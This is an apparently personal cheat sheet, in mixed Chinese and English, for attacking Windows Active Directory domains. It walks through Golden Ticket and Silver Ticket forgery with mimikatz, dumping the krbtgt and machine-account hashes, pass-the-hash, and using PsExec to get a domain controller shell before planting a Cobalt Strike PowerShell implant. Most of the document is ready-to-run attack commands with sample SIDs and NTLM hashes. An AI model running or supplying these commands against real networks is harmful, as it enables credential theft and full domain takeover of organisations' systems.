Gold bills and silver bills

Golden Ticket

When the attacker has obtained the domain controller's administrative authority
klist and executes klist on the domain member host, he can view the cached ticket
klist purge. Clear the ticket
during the domain penetration process. If the domain administrator's password has been changed, try to use the history of the krbtgt user Hash is used for ticket delivery attacks. Generally, no one will modify the password of the krbtgt user to
collect information.

域名 net time /domain    ipconfig /all 
伪造管理员用户名 net group "domain admins"
krbtgt账号的哈希值  mimikatz.exe "lsadump::dcsync /domain:NoOne.com /user:krbtgt" exit
域的SID值(去掉最后的500)  wmic useraccount get name,sid
#导出krbtgt的ntlm hash
mimikatz.exe "lsadump::dcsync /domain:NoOne.com /user:krbtgt" exit

Use

#伪造黄金票据
mimikatz.exe "kerberos::golden /admin:Administrator /domain:NOONE.com /sid:S-1-5-21-2867916317-3317112163-957300651 /krbtgt:f965f8d06c2f73dd5d7015d0c2d10fa6 /ticket:Administrator.kirbi" exit

#pass the ticket票据传递，获取域管理员权限
mimikatz.exe "kerberos::ptt Administrator.kirbi" exit

Silver Ticket

Fake TGS, can only access the specified server
information collection

域名 net time /domain    ipconfig /all 
域的SID值(去掉最后的500)  wmic useraccount get name,sid
目标机器的FQDN  net time /domain  就是hostname+域名 /target:\\WIN-75NA0949GFB.NOONE.com
可利用的服务CIFS(磁盘共享的服务) /service:CIFS	
要伪造的用户名  /user:Administrator
服务账号的ntlm hash(Primary Username : WIN-75NA0949GFB$带$的hash，不是admin的) /rc4:08d93ddf15a6309a46daaa7ec8565296
#生成了mimikatz.log文件(域控主机执行)
mimikatz.exe log "privilege::debug" "sekurlsa::logonpasswords" exit

/user: 要伪造的目标用户/计算机 Target Account/Computer to Impersonate
/ptt: Optional (Will Inject Ticket or you can do with Rubeus)
/service:cifs	服务参数为cifs
/domain    参数为域名
/sid	   参数为域sid (whoami /user)
/target    The FDQN 指定域内的机器  /target:WIN-75NA0949GFB.NOONE.com
/rc4       服务账号的ntml hash
/user      需要伪造的用户名  NTLM Hash of User Password/Computer Password

Use

#生成了mimikatz.log文件(域控主机执行)
mimikatz.exe log "privilege::debug" "sekurlsa::logonpasswords" exit

#伪造白银票据，伪造CIFS服务权限
mimikatz.exe "kerberos::golden /domain:NOONE.com /sid:S-1-5-21-2867916317-3317112163-957300651 /target:WIN-75NA0949GFB.NOONE.com /service:CIFS /rc4:08d93ddf15a6309a46daaa7ec8565296 /user:Administrator /ptt" exit

dir \\WIN-75NA0949GFB.NOONE.com\c$

pass the hash

拿到本地管理员权限,如果域控的密码和web本地管理员的密码相同可用pth

#提升权限且获取hash
mimikatz.exe ""privilege::debug"" ""sekurlsa::logonpasswords full"" exit >> log.txt  
#hash传递
mimikatz "privilege::debug" "sekurlsa::pth /user:administrator /domain:NoOne.com /ntlm:c217b77d43348c0fa3c1f83f29747d5a"
#列出域控主机C盘
dir  \\WIN-75NA0949GFB.NOONE.com\c$

只看域控的C盘很没意思吧，那就来点有意思的
在受控的域成员主机上 上传PsExec.exe，进到所在目录(https://github.com/vijayphilip/PsExecRemoteWinEC2)
psexec.exe \\WIN-75NA0949GFB.NOONE.com cmd.exe 即可反弹域控的shell
然后cs生成powershell马，使域控主机上线

Note: ERROR kuhl_m_kerberos_ptt_data; LsaCallAuthenticationPackage KerbSubmitTicketMessage: c000000d
After a series of experiments of mine, if the domain member host is windows xp or windows server 2003, it is impossible to forge a ticket normally